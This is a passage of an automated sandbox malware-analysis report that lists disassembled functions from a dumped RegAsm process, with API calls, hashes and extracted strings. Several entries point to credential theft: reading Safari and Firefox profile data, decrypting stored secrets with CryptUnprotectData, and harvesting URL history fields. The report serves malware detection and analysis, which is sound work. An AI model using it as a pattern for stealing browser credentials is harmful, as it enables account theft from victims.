                                                                        • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                        • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                        • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                        • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                        Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcsicmp.MSVCRT ref: 004022A6
                                                                        • _wcsicmp.MSVCRT ref: 004022D7
                                                                        • _wcsicmp.MSVCRT ref: 00402305
                                                                        • _wcsicmp.MSVCRT ref: 00402333
                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                        • memset.MSVCRT ref: 0040265F
                                                                        • memcpy.MSVCRT ref: 0040269B
                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                        • memcpy.MSVCRT ref: 004026FF
                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                        • API String ID: 2257402768-1134094380
                                                                        • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                        • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                        • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                        • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                        Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                        • String ID: :stringdata$ftp://$http://$https://
                                                                        • API String ID: 2787044678-1921111777
                                                                        • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                        • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                        • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                        • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                        Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                        • GetDC.USER32 ref: 004140E3
                                                                        • wcslen.MSVCRT ref: 00414123
                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                                                        • _snwprintf.MSVCRT ref: 00414244
                                                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                        • String ID: %s:$EDIT$STATIC
                                                                        • API String ID: 2080319088-3046471546
                                                                        • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                        • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                        • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                        • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                        Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00413221
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                        • memset.MSVCRT ref: 00413292
                                                                        • memset.MSVCRT ref: 004132B4
                                                                        • memset.MSVCRT ref: 004132CD
                                                                        • memset.MSVCRT ref: 004132E1
                                                                        • memset.MSVCRT ref: 004132FB
                                                                        • memset.MSVCRT ref: 00413310
                                                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                        • memset.MSVCRT ref: 004133C0
                                                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                        • memcpy.MSVCRT ref: 004133FC
                                                                        • wcscpy.MSVCRT ref: 0041341F
                                                                        • _snwprintf.MSVCRT ref: 0041348E
                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                        • SetFocus.USER32(00000000), ref: 004134B7
                                                                        Strings
                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                        • {Unknown}, xrefs: 004132A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                        • API String ID: 4111938811-1819279800
                                                                        • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                        • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                        • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                        • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                        Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                        • SetCursor.USER32(00000000), ref: 0040129E
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                        • EndDialog.USER32(?,?), ref: 0040135E
                                                                        • DeleteObject.GDI32(?), ref: 0040136A
                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                        • ShowWindow.USER32(00000000), ref: 00401398
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                        • String ID:
                                                                        • API String ID: 829165378-0
                                                                        • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                        • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                        • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                        • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                        Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        • wcscpy.MSVCRT ref: 004041D6
                                                                        • wcscpy.MSVCRT ref: 004041E7
                                                                        • memset.MSVCRT ref: 00404200
                                                                        • memset.MSVCRT ref: 00404215
                                                                        • _snwprintf.MSVCRT ref: 0040422F
                                                                        • wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 0040426E
                                                                        • memset.MSVCRT ref: 004042CD
                                                                        • memset.MSVCRT ref: 004042E2
                                                                        • _snwprintf.MSVCRT ref: 004042FE
                                                                        • wcscpy.MSVCRT ref: 00404311
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                        • API String ID: 2454223109-1580313836
                                                                        • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                        • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                        • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                        • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                        Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                        • memcpy.MSVCRT ref: 004115C8
                                                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                        • API String ID: 4054529287-3175352466
                                                                        • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                        • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                        • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                        • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                        Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                        • API String ID: 2000436516-3842416460
                                                                        • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                        • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                        • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                        • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                        Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                          • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                          • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                          • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                        • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                        • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                        • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                        • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                        • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                        • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                        • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                        • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                        • String ID:
                                                                        • API String ID: 1043902810-0
                                                                        • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                        • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                        • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                        • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                        Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                        • memset.MSVCRT ref: 0040E380
                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                        • wcschr.MSVCRT ref: 0040E3B8
                                                                        • memcpy.MSVCRT ref: 0040E3EC
                                                                        • memcpy.MSVCRT ref: 0040E407
                                                                        • memcpy.MSVCRT ref: 0040E422
                                                                        • memcpy.MSVCRT ref: 0040E43D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                        • API String ID: 3073804840-2252543386
                                                                        • Opcode ID: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                        • Opcode Fuzzy Hash: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                        Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@??3@_snwprintfwcscpy
                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                        • API String ID: 2899246560-1542517562
                                                                        • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                        • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                        Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                        • String ID:
                                                                        • API String ID: 3715365532-3916222277
                                                                        • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                        • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                        Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        • memset.MSVCRT ref: 004085CF
                                                                        • memset.MSVCRT ref: 004085F1
                                                                        • memset.MSVCRT ref: 00408606
                                                                        • strcmp.MSVCRT ref: 00408645
                                                                        • _mbscpy.MSVCRT ref: 004086DB
                                                                        • _mbscpy.MSVCRT ref: 004086FA
                                                                        • memset.MSVCRT ref: 0040870E
                                                                        • strcmp.MSVCRT ref: 0040876B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                        • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                        • String ID: ---
                                                                        • API String ID: 3437578500-2854292027
                                                                        • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                        • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                        Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041087D
                                                                        • memset.MSVCRT ref: 00410892
                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                                                        • DeleteObject.GDI32(?), ref: 004109D0
                                                                        • DeleteObject.GDI32(?), ref: 004109D6
                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                        Memory Dump Source
